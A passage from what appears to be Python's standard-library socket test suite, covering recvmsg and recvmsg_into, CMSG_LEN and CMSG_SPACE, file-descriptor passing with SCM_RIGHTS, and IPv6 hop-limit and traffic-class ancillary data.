# recvmsg_into(), and can use any socket type.
def testRecvmsg(self):
# Receive a simple message with recvmsg[_into]().
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsg(self):
self.sendToServer(MSG)
def testRecvmsgExplicitDefaults(self):
# Test recvmsg[_into]() with default arguments provided explicitly.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgExplicitDefaults(self):
self.sendToServer(MSG)
def testRecvmsgShorter(self):
# Receive a message smaller than buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) + 42)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShorter(self):
self.sendToServer(MSG)
def testRecvmsgTrunc(self):
# Receive part of message, check for truncation indicators.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
def _testRecvmsgTrunc(self):
self.sendToServer(MSG)
def testRecvmsgShortAncillaryBuf(self):
# Test ancillary data buffer too small to hold any ancillary data.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 1)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgShortAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgLongAncillaryBuf(self):
# Test large ancillary data buffer.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgLongAncillaryBuf(self):
self.sendToServer(MSG)
def testRecvmsgAfterClose(self):
# Check that recvmsg[_into]() fails on a closed socket.
self.serv_sock.close()
self.assertRaises(OSError, self.doRecvmsg, self.serv_sock, 1024)
def _testRecvmsgAfterClose(self):
pass
def testRecvmsgTimeout(self):
# Check that timeout works.
try:
self.serv_sock.settimeout(0.03)
self.assertRaises(socket.timeout,
self.doRecvmsg, self.serv_sock, len(MSG))
finally:
self.misc_event.set()
def _testRecvmsgTimeout(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
@requireAttrs(socket, "MSG_PEEK")
def testRecvmsgPeek(self):
# Check that MSG_PEEK in flags enables examination of pending
# data without consuming it.
# Receive part of data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3, 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG[:-3])
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
# Ignoring MSG_TRUNC here (so this test is the same for stream
# and datagram sockets). Some wording in POSIX seems to
# suggest that it needn't be set when peeking, but that may
# just be a slip.
self.checkFlags(flags, eor=False,
ignore=getattr(socket, "MSG_TRUNC", 0))
# Receive all data with MSG_PEEK.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 0,
socket.MSG_PEEK)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
# Check that the same data can still be received normally.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgPeek.client_skip
def _testRecvmsgPeek(self):
self.sendToServer(MSG)
@requireAttrs(socket.socket, "sendmsg")
def testRecvmsgFromSendmsg(self):
# Test receiving with recvmsg[_into]() when message is sent
# using sendmsg().
self.serv_sock.settimeout(self.fail_timeout)
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, len(MSG))
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
@testRecvmsgFromSendmsg.client_skip
def _testRecvmsgFromSendmsg(self):
self.assertEqual(self.sendmsgToServer([MSG[:3], MSG[3:]]), len(MSG))
class RecvmsgGenericStreamTests(RecvmsgGenericTests):
# Tests which require a stream socket and can use either recvmsg()
# or recvmsg_into().
def testRecvmsgEOF(self):
# Receive end-of-stream indicator (b"", peer socket closed).
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.assertEqual(msg, b"")
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=None) # Might not have end-of-record marker
def _testRecvmsgEOF(self):
self.cli_sock.close()
def testRecvmsgOverflow(self):
# Receive a message in more than one chunk.
seg1, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG) - 3)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=False)
seg2, ancdata, flags, addr = self.doRecvmsg(self.serv_sock, 1024)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
msg = seg1 + seg2
self.assertEqual(msg, MSG)
def _testRecvmsgOverflow(self):
self.sendToServer(MSG)
class RecvmsgTests(RecvmsgGenericTests):
# Tests for recvmsg() which can use any socket type.
def testRecvmsgBadArgs(self):
# Check that recvmsg() rejects invalid arguments.
self.assertRaises(TypeError, self.serv_sock.recvmsg)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
-1, 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg,
len(MSG), -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
[bytearray(10)], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
object(), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg,
len(MSG), 0, object())
msg, ancdata, flags, addr = self.serv_sock.recvmsg(len(MSG), 0, 0)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgBadArgs(self):
self.sendToServer(MSG)
class RecvmsgIntoTests(RecvmsgIntoMixin, RecvmsgGenericTests):
# Tests for recvmsg_into() which can use any socket type.
def testRecvmsgIntoBadArgs(self):
# Check that recvmsg_into() rejects invalid arguments.
buf = bytearray(len(MSG))
self.assertRaises(TypeError, self.serv_sock.recvmsg_into)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
len(MSG), 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
buf, 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[object()], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[b"I'm not writable"], 0, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf, object()], 0, 0)
self.assertRaises(ValueError, self.serv_sock.recvmsg_into,
[buf], -1, 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], object(), 0)
self.assertRaises(TypeError, self.serv_sock.recvmsg_into,
[buf], 0, object())
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf], 0, 0)
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoBadArgs(self):
self.sendToServer(MSG)
def testRecvmsgIntoGenerator(self):
# Receive into buffer obtained from a generator (not a sequence).
buf = bytearray(len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
(o for o in [buf]))
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf, bytearray(MSG))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoGenerator(self):
self.sendToServer(MSG)
def testRecvmsgIntoArray(self):
# Receive into an array rather than the usual bytearray.
buf = array.array("B", [0] * len(MSG))
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into([buf])
self.assertEqual(nbytes, len(MSG))
self.assertEqual(buf.tobytes(), MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoArray(self):
self.sendToServer(MSG)
def testRecvmsgIntoScatter(self):
# Receive into multiple buffers (scatter write).
b1 = bytearray(b"----")
b2 = bytearray(b"0123456789")
b3 = bytearray(b"--------------")
nbytes, ancdata, flags, addr = self.serv_sock.recvmsg_into(
[b1, memoryview(b2)[2:9], b3])
self.assertEqual(nbytes, len(b"Mary had a little lamb"))
self.assertEqual(b1, bytearray(b"Mary"))
self.assertEqual(b2, bytearray(b"01 had a 9"))
self.assertEqual(b3, bytearray(b"little lamb---"))
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True)
def _testRecvmsgIntoScatter(self):
self.sendToServer(b"Mary had a little lamb")
class CmsgMacroTests(unittest.TestCase):
# Test the functions CMSG_LEN() and CMSG_SPACE(). Tests
# assumptions used by sendmsg() and recvmsg[_into](), which share
# code with these functions.
# Match the definition in socketmodule.c
try:
import _testcapi
except ImportError:
socklen_t_limit = 0x7fffffff
else:
socklen_t_limit = min(0x7fffffff, _testcapi.INT_MAX)
@requireAttrs(socket, "CMSG_LEN")
def testCMSG_LEN(self):
# Test CMSG_LEN() with various valid and invalid values,
# checking the assumptions used by recvmsg() and sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_LEN(0) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(socket.CMSG_LEN(0), array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_LEN(n)
# This is how recvmsg() calculates the data size
self.assertEqual(ret - socket.CMSG_LEN(0), n)
self.assertLessEqual(ret, self.socklen_t_limit)
self.assertRaises(OverflowError, socket.CMSG_LEN, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_LEN, toobig)
self.assertRaises(OverflowError, socket.CMSG_LEN, sys.maxsize)
@requireAttrs(socket, "CMSG_SPACE")
def testCMSG_SPACE(self):
# Test CMSG_SPACE() with various valid and invalid values,
# checking the assumptions used by sendmsg().
toobig = self.socklen_t_limit - socket.CMSG_SPACE(1) + 1
values = list(range(257)) + list(range(toobig - 257, toobig))
last = socket.CMSG_SPACE(0)
# struct cmsghdr has at least three members, two of which are ints
self.assertGreater(last, array.array("i").itemsize * 2)
for n in values:
ret = socket.CMSG_SPACE(n)
self.assertGreaterEqual(ret, last)
self.assertGreaterEqual(ret, socket.CMSG_LEN(n))
self.assertGreaterEqual(ret, n + socket.CMSG_LEN(0))
self.assertLessEqual(ret, self.socklen_t_limit)
last = ret
self.assertRaises(OverflowError, socket.CMSG_SPACE, -1)
# sendmsg() shares code with these functions, and requires
# that it reject values over the limit.
self.assertRaises(OverflowError, socket.CMSG_SPACE, toobig)
self.assertRaises(OverflowError, socket.CMSG_SPACE, sys.maxsize)
class SCMRightsTest(SendrecvmsgServerTimeoutBase):
# Tests for file descriptor passing on Unix-domain sockets.
# Invalid file descriptor value that's unlikely to evaluate to a
# real FD even if one of its bytes is replaced with a different
# value (which shouldn't actually happen).
badfd = -0x5555
def newFDs(self, n):
# Return a list of n file descriptors for newly-created files
# containing their list indices as ASCII numbers.
fds = []
for i in range(n):
fd, path = tempfile.mkstemp()
self.addCleanup(os.unlink, path)
self.addCleanup(os.close, fd)
os.write(fd, str(i).encode())
fds.append(fd)
return fds
def checkFDs(self, fds):
# Check that the file descriptors in the given list contain
# their correct list indices as ASCII numbers.
for n, fd in enumerate(fds):
os.lseek(fd, 0, os.SEEK_SET)
self.assertEqual(os.read(fd, 1024), str(n).encode())
def registerRecvmsgResult(self, result):
self.addCleanup(self.closeRecvmsgFDs, result)
def closeRecvmsgFDs(self, recvmsg_result):
# Close all file descriptors specified in the ancillary data
# of the given return value from recvmsg() or recvmsg_into().
for cmsg_level, cmsg_type, cmsg_data in recvmsg_result[1]:
if (cmsg_level == socket.SOL_SOCKET and
cmsg_type == socket.SCM_RIGHTS):
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
for fd in fds:
os.close(fd)
def createAndSendFDs(self, n):
# Send n new file descriptors created by newFDs() to the
# server, with the constant MSG as the non-ancillary data.
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(n)))]),
len(MSG))
def checkRecvmsgFDs(self, numfds, result, maxcmsgs=1, ignoreflags=0):
# Check that constant MSG was received with numfds file
# descriptors in a maximum of maxcmsgs control messages (which
# must contain only complete integers). By default, check
# that MSG_CTRUNC is unset, but ignore any flags in
# ignoreflags.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertIsInstance(ancdata, list)
self.assertLessEqual(len(ancdata), maxcmsgs)
fds = array.array("i")
for item in ancdata:
self.assertIsInstance(item, tuple)
cmsg_level, cmsg_type, cmsg_data = item
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data) % SIZEOF_INT, 0)
fds.frombytes(cmsg_data)
self.assertEqual(len(fds), numfds)
self.checkFDs(fds)
def testFDPassSimple(self):
# Pass a single FD (array read from bytes object).
self.checkRecvmsgFDs(1, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testFDPassSimple(self):
self.assertEqual(
self.sendmsgToServer(
[MSG],
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", self.newFDs(1)).tobytes())]),
len(MSG))
def testMultipleFDPass(self):
# Pass multiple FDs in a single array.
self.checkRecvmsgFDs(4, self.doRecvmsg(self.serv_sock,
len(MSG), 10240))
def _testMultipleFDPass(self):
self.createAndSendFDs(4)
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassCMSG_SPACE(self):
# Test using CMSG_SPACE() to calculate ancillary buffer size.
self.checkRecvmsgFDs(
4, self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(4 * SIZEOF_INT)))
@testFDPassCMSG_SPACE.client_skip
def _testFDPassCMSG_SPACE(self):
self.createAndSendFDs(4)
def testFDPassCMSG_LEN(self):
# Test using CMSG_LEN() to calculate ancillary buffer size.
self.checkRecvmsgFDs(1,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(4 * SIZEOF_INT)),
# RFC 3542 says implementations may set
# MSG_CTRUNC if there isn't enough space
# for trailing padding.
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassCMSG_LEN(self):
self.createAndSendFDs(1)
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparate(self):
# Pass two FDs in two separate arrays. Arrays may be combined
# into a single control message by the OS.
self.checkRecvmsgFDs(2,
self.doRecvmsg(self.serv_sock, len(MSG), 10240),
maxcmsgs=2)
@testFDPassSeparate.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparate(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassSeparateMinSpace(self):
# Pass two FDs in two separate arrays, receiving them into the
# minimum space for two arrays.
num_fds = 2
self.checkRecvmsgFDs(num_fds,
self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_SPACE(SIZEOF_INT) +
socket.CMSG_LEN(SIZEOF_INT * num_fds)),
maxcmsgs=2, ignoreflags=socket.MSG_CTRUNC)
@testFDPassSeparateMinSpace.client_skip
@unittest.skipIf(sys.platform == "darwin", "skipping, see issue #12958")
@unittest.skipIf(AIX, "skipping, see issue #22397")
def _testFDPassSeparateMinSpace(self):
fd0, fd1 = self.newFDs(2)
self.assertEqual(
self.sendmsgToServer([MSG], [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0])),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))]),
len(MSG))
def sendAncillaryIfPossible(self, msg, ancdata):
# Try to send msg and ancdata to server, but if the system
# call fails, just send msg with no ancillary data.
try:
nbytes = self.sendmsgToServer([msg], ancdata)
except OSError as e:
# Check that it was the system call that failed
self.assertIsInstance(e.errno, int)
nbytes = self.sendmsgToServer([msg])
self.assertEqual(nbytes, len(msg))
@unittest.skipIf(sys.platform == "darwin", "see issue #24725")
def testFDPassEmpty(self):
# Try to pass an empty FD array. Can receive either no array
# or an empty array.
self.checkRecvmsgFDs(0, self.doRecvmsg(self.serv_sock,
len(MSG), 10240),
ignoreflags=socket.MSG_CTRUNC)
def _testFDPassEmpty(self):
self.sendAncillaryIfPossible(MSG, [(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
b"")])
def testFDPassPartialInt(self):
# Try to pass a truncated FD array.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 1)
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertLess(len(cmsg_data), SIZEOF_INT)
def _testFDPassPartialInt(self):
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [self.badfd]).tobytes()[:-1])])
@requireAttrs(socket, "CMSG_SPACE")
def testFDPassPartialIntInMiddle(self):
# Try to pass two FD arrays, the first of which is truncated.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), 10240)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, ignore=socket.MSG_CTRUNC)
self.assertLessEqual(len(ancdata), 2)
fds = array.array("i")
# Arrays may have been combined in a single control message
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.assertLessEqual(len(fds), 2)
self.checkFDs(fds)
@testFDPassPartialIntInMiddle.client_skip
def _testFDPassPartialIntInMiddle(self):
fd0, fd1 = self.newFDs(2)
self.sendAncillaryIfPossible(
MSG,
[(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd0, self.badfd]).tobytes()[:-1]),
(socket.SOL_SOCKET,
socket.SCM_RIGHTS,
array.array("i", [fd1]))])
def checkTruncatedHeader(self, result, ignoreflags=0):
# Check that no ancillary data items are returned when data is
# truncated inside the cmsghdr structure.
msg, ancdata, flags, addr = result
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.assertEqual(ancdata, [])
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC,
ignore=ignoreflags)
def testCmsgTruncNoBufSize(self):
# Check that no ancillary data is received when no buffer size
# is specified.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG)),
# BSD seems to set MSG_CTRUNC only
# if an item has been partially
# received.
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTruncNoBufSize(self):
self.createAndSendFDs(1)
def testCmsgTrunc0(self):
# Check that no ancillary data is received when buffer size is 0.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 0),
ignoreflags=socket.MSG_CTRUNC)
def _testCmsgTrunc0(self):
self.createAndSendFDs(1)
# Check that no ancillary data is returned for various non-zero
# (but still too small) buffer sizes.
def testCmsgTrunc1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG), 1))
def _testCmsgTrunc1(self):
self.createAndSendFDs(1)
def testCmsgTrunc2Int(self):
# The cmsghdr structure has at least three members, two of
# which are ints, so we still shouldn't see any ancillary
# data.
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
SIZEOF_INT * 2))
def _testCmsgTrunc2Int(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Minus1(self):
self.checkTruncatedHeader(self.doRecvmsg(self.serv_sock, len(MSG),
socket.CMSG_LEN(0) - 1))
def _testCmsgTruncLen0Minus1(self):
self.createAndSendFDs(1)
# The following tests try to truncate the control message in the
# middle of the FD array.
def checkTruncatedArray(self, ancbuf, maxdata, mindata=0):
# Check that file descriptor data is truncated to between
# mindata and maxdata bytes when received with buffer size
# ancbuf, and that any complete file descriptor numbers are
# valid.
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbuf)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkset=socket.MSG_CTRUNC)
if mindata == 0 and ancdata == []:
return
self.assertEqual(len(ancdata), 1)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.SOL_SOCKET)
self.assertEqual(cmsg_type, socket.SCM_RIGHTS)
self.assertGreaterEqual(len(cmsg_data), mindata)
self.assertLessEqual(len(cmsg_data), maxdata)
fds = array.array("i")
fds.frombytes(cmsg_data[:
len(cmsg_data) - (len(cmsg_data) % fds.itemsize)])
self.checkFDs(fds)
def testCmsgTruncLen0(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0), maxdata=0)
def _testCmsgTruncLen0(self):
self.createAndSendFDs(1)
def testCmsgTruncLen0Plus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(0) + 1, maxdata=1)
def _testCmsgTruncLen0Plus1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(SIZEOF_INT),
maxdata=SIZEOF_INT)
def _testCmsgTruncLen1(self):
self.createAndSendFDs(2)
def testCmsgTruncLen2Minus1(self):
self.checkTruncatedArray(ancbuf=socket.CMSG_LEN(2 * SIZEOF_INT) - 1,
maxdata=(2 * SIZEOF_INT) - 1)
def _testCmsgTruncLen2Minus1(self):
self.createAndSendFDs(2)
class RFC3542AncillaryTest(SendrecvmsgServerTimeoutBase):
# Test sendmsg() and recvmsg[_into]() using the ancillary data
# features of the RFC 3542 Advanced Sockets API for IPv6.
# Currently we can only handle certain data items (e.g. traffic
# class, hop limit, MTU discovery and fragmentation settings)
# without resorting to unportable means such as the struct module,
# but the tests here are aimed at testing the ancillary data
# handling in sendmsg() and recvmsg() rather than the IPv6 API
# itself.
# Test value to use when setting hop limit of packet
hop_limit = 2
# Test value to use when setting traffic class of packet.
# -1 means "use kernel default".
traffic_class = -1
def ancillaryMapping(self, ancdata):
# Given ancillary data list ancdata, return a mapping from
# pairs (cmsg_level, cmsg_type) to corresponding cmsg_data.
# Check that no (level, type) pair appears more than once.
d = {}
for cmsg_level, cmsg_type, cmsg_data in ancdata:
self.assertNotIn((cmsg_level, cmsg_type), d)
d[(cmsg_level, cmsg_type)] = cmsg_data
return d
def checkHopLimit(self, ancbufsize, maxhop=255, ignoreflags=0):
# Receive hop limit into ancbufsize bytes of ancillary data
# space. Check that data is MSG, ancillary data is not
# truncated (but ignore any flags in ignoreflags), and hop
# limit is between 0 and maxhop inclusive.
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 1)
self.assertIsInstance(ancdata[0], tuple)
cmsg_level, cmsg_type, cmsg_data = ancdata[0]
self.assertEqual(cmsg_level, socket.IPPROTO_IPV6)
self.assertEqual(cmsg_type, socket.IPV6_HOPLIMIT)
self.assertIsInstance(cmsg_data, bytes)
self.assertEqual(len(cmsg_data), SIZEOF_INT)
a = array.array("i")
a.frombytes(cmsg_data)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimit(self):
# Test receiving the packet hop limit as ancillary data.
self.checkHopLimit(ancbufsize=10240)
@testRecvHopLimit.client_skip
def _testRecvHopLimit(self):
# Need to wait until server has asked to receive ancillary
# data, as implementations are not required to buffer it
# otherwise.
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testRecvHopLimitCMSG_SPACE(self):
# Test receiving hop limit, using CMSG_SPACE to calculate buffer size.
self.checkHopLimit(ancbufsize=socket.CMSG_SPACE(SIZEOF_INT))
@testRecvHopLimitCMSG_SPACE.client_skip
def _testRecvHopLimitCMSG_SPACE(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
# Could test receiving into buffer sized using CMSG_LEN, but RFC
# 3542 says portable applications must provide space for trailing
# padding. Implementations may set MSG_CTRUNC if there isn't
# enough space for the padding.
@requireAttrs(socket.socket, "sendmsg")
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT")
def testSetHopLimit(self):
# Test setting hop limit on outgoing packet and receiving it
# at the other end.
self.checkHopLimit(ancbufsize=10240, maxhop=self.hop_limit)
@testSetHopLimit.client_skip
def _testSetHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.assertEqual(
self.sendmsgToServer([MSG],
[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT,
array.array("i", [self.hop_limit]))]),
len(MSG))
def checkTrafficClassAndHopLimit(self, ancbufsize, maxhop=255,
ignoreflags=0):
# Receive traffic class and hop limit into ancbufsize bytes of
# ancillary data space. Check that data is MSG, ancillary
# data is not truncated (but ignore any flags in ignoreflags),
# and traffic class and hop limit are in range (hop limit no
# more than maxhop).
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVHOPLIMIT, 1)
self.serv_sock.setsockopt(socket.IPPROTO_IPV6,
socket.IPV6_RECVTCLASS, 1)
self.misc_event.set()
msg, ancdata, flags, addr = self.doRecvmsg(self.serv_sock,
len(MSG), ancbufsize)
self.assertEqual(msg, MSG)
self.checkRecvmsgAddress(addr, self.cli_addr)
self.checkFlags(flags, eor=True, checkunset=socket.MSG_CTRUNC,
ignore=ignoreflags)
self.assertEqual(len(ancdata), 2)
ancmap = self.ancillaryMapping(ancdata)
tcdata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_TCLASS)]
self.assertEqual(len(tcdata), SIZEOF_INT)
a = array.array("i")
a.frombytes(tcdata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], 255)
hldata = ancmap[(socket.IPPROTO_IPV6, socket.IPV6_HOPLIMIT)]
self.assertEqual(len(hldata), SIZEOF_INT)
a = array.array("i")
a.frombytes(hldata)
self.assertGreaterEqual(a[0], 0)
self.assertLessEqual(a[0], maxhop)
@requireAttrs(socket, "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimit(self):
# Test receiving traffic class and hop limit as ancillary data.
self.checkTrafficClassAndHopLimit(ancbufsize=10240)
@testRecvTrafficClassAndHopLimit.client_skip
def _testRecvTrafficClassAndHopLimit(self):
self.assertTrue(self.misc_event.wait(timeout=self.fail_timeout))
self.sendToServer(MSG)
@requireAttrs(socket, "CMSG_SPACE", "IPV6_RECVHOPLIMIT", "IPV6_HOPLIMIT",
"IPV6_RECVTCLASS", "IPV6_TCLASS")
def testRecvTrafficClassAndHopLimitCMSG_SPACE(self):
# Test receiving traffic class and hop limit, using
# CMSG_SPACE() to calculate buffer size.
self.checkTrafficClassAndHopLimit(
ancbufsize=socket.CMSG_SPACE(SIZEOF_INT) * 2)
@testRecvTrafficClassAndHopLimitCMSG_SPACE.client_skip
